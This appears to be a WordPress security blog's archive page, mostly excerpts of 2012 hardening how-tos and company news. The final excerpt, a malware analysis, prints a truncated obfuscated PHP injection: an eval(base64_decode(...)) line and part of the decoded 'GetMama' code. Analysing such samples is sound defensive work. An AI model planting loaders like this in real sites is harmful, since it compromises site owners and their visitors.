Muitas vezes você escuta a pergunta, “Quais plugins devo usar para ter segurança no WordPress?”. É uma pergunta válida, mas não é a melhor abordagem se essa é a única pergunta que você está fazendo ou a única ação que você está tomando. Se você está deixando a segurança do seu blog nas mãos de [...]
Website Malware Removal – WordPress Tips & Tricks
July 19, 2012 by 1 Comment
We often write posts that give you advice and recommendations around how to harden your websites, and have only recently begun to give advice on ways to navigate your backend and remove infections via terminal. But what about all the basics? That’s what I want to cover in this post. All those things that you should know [...]
How To: Lock Your Site by Enabling a Second Layer of Authentication
June 25, 2012 by
I put together a post this weekend about my personal experience installing a WordPress site on a clean Server. In the process of hardening the administration panel I found myself doing something that I don’t see discussed much – enabling Basic Access Authentication. That got me thinking about a putting together this post which will [...]
How To: Stop The Hacker By Hardening WordPress
June 19, 2012 by
Every day we service 100′s of clients and the question is always asked: How do you stop these hackers!!!” Unfortunately, it’s perhaps the hardest to explain and understand for most. That being said, this post will be one of a series that talks to what end-users can do to help reduce their threat landscape. This [...]
How To: Lock Down WordPress Admin Panel With a Dynamic IP
June 15, 2012 by
There is often a lot of discussion around locking down access to WP-ADMIN and WP-Login.php, specially around restricting it by IP. The issues and retort that often comes up is, “but what if I have a dynamic IP?” Right away the response from folks is, “oh, well then this won’t work for me.” It didn’t [...]
3 Easy Steps to Make WordPress Updates Safer
June 13, 2012 by 5 Comments
With the release of WordPress 3.4 inching closer (could be minutes), we wanted to put together a quick post to help you towards a successful update. Here are a few areas to help you prepare for an easy update to the latest and greatest version of WordPress: 1. Backup your website Updates in WordPress these [...]
Sucuri Gets a Facelift
May 6, 2012 by 4 Comments
It’s funny, Andrew Warner of Mixergy was recently conducting an interview and in it he brought up Sucuri. One of the things he said was: Those guys at Sucuri must be doing well, you couldn’t tell from their site though… That made us chuckle as we have been in the process of revamping a number [...]
Sponsoring WordCamp Orange County 2012
May 1, 2012 by 1 Comment
We are very happy to help our local organizers with this year’s WordCamp Orange county by offering some financial support. If past years are any sign of what is to come, it should be a great opportunity for all WordPress enthusiasts to come together and share what we have learned over the past
Sucuri at WordCamp San Diego 2012
March 23, 2012 by Leave a Comment
Game on folks! Sucuri is proud to be a part of WordCamp San Diego 2012. Both Dre and Tony are two of the organizers of the event and can be found roaming the halls wearing their cool WordCamp San Diego jerseys! Here they are getting ready to have a good time!
New Malware – Eval + GetMama + Encoded Javascript
March 15, 2012 by
We are seeing many WordPress sites on shared hosts getting compromised with an encoded javascript malware. It has multiple levels of obfuscation and that’s how it starts: 1- ALL PHP files with an eval (base64_decode line of code: /*god_mode_on*/eval (base64_decode("ZXZhbC hiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0 phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBvVmpGc2 JsTXdUa2RpVjFKWVRsZHdhMUl5ZURKWmJYYzFZa.. 2- That long piece of code, once executed gets decoded to: if (!function_exists(GetMama)){function opanki ($buf){$god_mode = $_SERVER["good"]; [...]
